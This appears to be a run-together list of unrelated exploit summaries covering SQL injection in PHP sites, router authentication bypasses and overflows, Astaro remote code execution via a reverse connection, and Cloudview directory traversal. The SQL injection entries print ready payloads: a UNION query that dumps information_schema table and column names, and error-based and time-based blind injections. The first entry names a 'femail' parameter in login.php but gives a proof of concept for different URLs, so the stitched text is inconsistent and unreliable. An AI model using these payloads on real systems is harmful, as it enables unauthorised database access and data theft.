The 'femail' parameter of the 'login.php' script is not properly sanitized before being used in a SQL query, which allows an attacker to inject SQL commands.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept: http://localhost/[PATH]/index.php?view=product&id=[SQL] http://localhost/[PATH]/index.php?view=products&id=[SQL] -4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--+-
The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially crafted requests to the management console. The bug is exploitable remotely when the router is configured to expose the management console. The router does not validate the session token when returning answers for some methods under the URL '/api'. An attacker can use this vulnerability to retrieve sensitive information such as private/public IP addresses, SSID names, and passwords.
This exploit allows an attacker to upload custom firmware to a device by accessing an Ethernet port. This is possible because the system recovery service is started and available for a few seconds after restart. The attacker can use a wget command to check if the system is vulnerable and then use a curl command to upload the custom firmware.
A stack overflow vulnerability exists in the HNAP protocol implementation of D-Link routers. An attacker can send a specially crafted request to the router, which can overflow the stack and execute arbitrary sh commands with root privileges.
The phpcgi binary is responsible for processing requests to .php, .asp and .txt pages. An attacker can craft a request that bypasses authorization and executes a script that returns the router's login and password.
SQL injection on [idvalue] URI parameter. Proof of Concept (PoC): SQLi: http://localhost/[path]/review-details.php?idvalue=9 and sleep(5). Parameter: idvalue (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: idvalue=90 AND (SELECT 5020 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(5020=5020,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a). Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: idvalue=90 AND SLEEP(5)
SQL injection on [view] URI parameter. Proof of Concept (PoC): SQLi: http://localhost/[path]/xyz-auto-classifieds/item/view/13 and sleep(5)
This exploit allows an unauthenticated attacker to execute arbitrary code on Astaro Security Gateway v7. It works by sending two requests to the vulnerable server. The first request clears the cache and the second request triggers a reverse connection to the attacker's machine. The attacker's machine then sends a Perl script to the vulnerable server which creates a socket and allows the attacker to execute arbitrary code.
This module exploits a vulnerability found in Cloudview NMS server. The software contains a directory traversal vulnerability that allows a remote attacker to write arbitrary files to the file system, which results in code execution in the context of 'SYSTEM'.